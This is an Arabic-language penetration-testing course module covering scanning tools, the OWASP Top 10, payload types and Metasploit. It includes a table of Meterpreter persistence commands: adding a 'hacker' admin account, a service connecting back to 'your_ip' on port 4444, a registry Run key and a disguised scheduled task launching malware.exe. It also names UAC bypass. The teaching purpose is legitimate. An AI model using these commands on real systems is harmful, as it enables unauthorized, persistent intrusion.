ضمن مقرر الأمن السيبراني - قسم اختبار الاختراق
في هذه الوحدة، سنتعلم كيفية تحليل الثغرات الأمنية واستغلالها للوصول غير المصرح به إلى الأنظمة، مع التركيز على أدوات وتطبيقات عملية تستخدم في عمليات اختبار الاختراق. سنغطي أنواع الثغرات الشائعة، أدوات الاستغلال مثل Metasploit، وإنشاء واستغلال Payloads، بالإضافة إلى تقنيات الحفاظ على الوصول وتجاوز وسائل الحماية.
فحص المنافذ هو الخطوة الأولى لاكتشاف الثغرات المحتملة في الأنظمة المستهدفة. يتم ذلك من خلال:
أداة مسح الشبكات واكتشاف الخدمات
ماسح ضوئي متقدم للثغرات
ماسح ضوئي لثغرات الويب
OWASP Top 10 هي قائمة بأكثر ثغرات تطبيقات الويب خطورة والتي ينشرها مشروع OWASP:
مثل SQL Injection، OS Command Injection
ضعف في أنظمة المصادقة وإدارة الجلسات
عدم تشفير البيانات المهمة بشكل صحيح
ثغرات في معالجة ملفات XML
ضعف في أنظمة الصلاحيات والتحكم
يتصل بالهجوم بدلاً من انتظار اتصال منه
يفتح منفذ على الجهاز المستهدف وينتظر اتصال
ينفذ على مراحل لتجنب الاكتشاف
| التقنية | الوصف | أمر Meterpreter |
|---|---|---|
| إضافة مستخدم | إنشاء حساب مستخدم جديد مع صلاحيات إدارية | shell -> net user hacker Password123 /add |
| خدمة النظام | إنشاء خدمة تعمل عند بدء التشغيل | persistence -X -i 60 -p 4444 -r your_ip |
| مفتاح التسجيل | إضافة إلى Run أو Startup في التسجيل | reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v malware -d 'C:\\malware.exe' |
| مهمة مجدولة | إنشاء مهمة مجدولة تنفذ Payload بشكل دوري | shell -> schtasks /create /tn "Update" /tr "C:\\malware.exe" /sc hourly /mo 1 |
bypassuac في Metasploitجميع التقنيات والأدوات المذكورة في هذه الوحدة هي لأغراض تعليمية واختبار اختراق قانوني فقط. استخدام هذه التقنيات على أنظمة دون إذن صريح يعتبر جريمة إلكترونية يعاقب عليها القانون. كن محترفًا أخلاقيًا واستخدم هذه المعرفة لتحسين الأمن السيبراني وليس لانتهاكه.
قبل البدء بأي اختبار اختراق، تأكد من:
التزم بمبادئ القرصنة الأخلاقية: